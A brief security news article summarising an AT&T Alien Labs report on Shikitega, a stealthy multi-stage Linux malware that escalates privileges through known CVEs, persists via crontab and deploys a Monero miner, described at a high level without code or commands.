Shikitega, a new type of stealthy Linux malware that uses a multi-stage infection chain to infiltrate endpoints and IoT devices and deposit further payloads, has been found.
According to a report released recently by AT&T Alien Labs, an attacker may take complete control of the machine in addition to the bitcoin miner that will be launched and configured to persist. The discoveries increase the number of Linux malware instances that have recently been discovered in the wild, including OrBit, Syslogk, BPFDoor, Symbiote, and Lightning Framework.
The attack chain downloads and runs the Metasploit “Mettle” meterpreter once it has been installed on a target host in order to gain the most control. It then uses vulnerabilities to gain elevated privileges, adds persistence to the host using crontab, and finally starts a cryptocurrency miner on infected devices. Although the precise means of the first intrusion are still unknown, Shikitega is elusive because of its capacity to download next-stage payloads from a command-and-control (C2) server and execute them instantly in memory.
The attacker can misuse the elevated permissions to retrieve and run the last stage shell scripts with root access to establish persistence and deploy the Monero crypto miner by abusing CVE-2021-4034 (also known as PwnKit) and CVE-2021-3493. To further evade detection, the malware’s operators use a “Shikata ga nai” polymorphic encoder to make it harder for antivirus engines to find it and make use of reliable cloud services for C2 activities.
“Threat actors continue to search for ways to deliver malware in new ways to stay under the radar and avoid detection,” said AT&T Alien Labs researcher Ofer Caspi. “Shiketega malware is delivered in a sophisticated way, it uses a polymorphic encoder, and it gradually delivers its payload where each step reveals only part of the total payload.”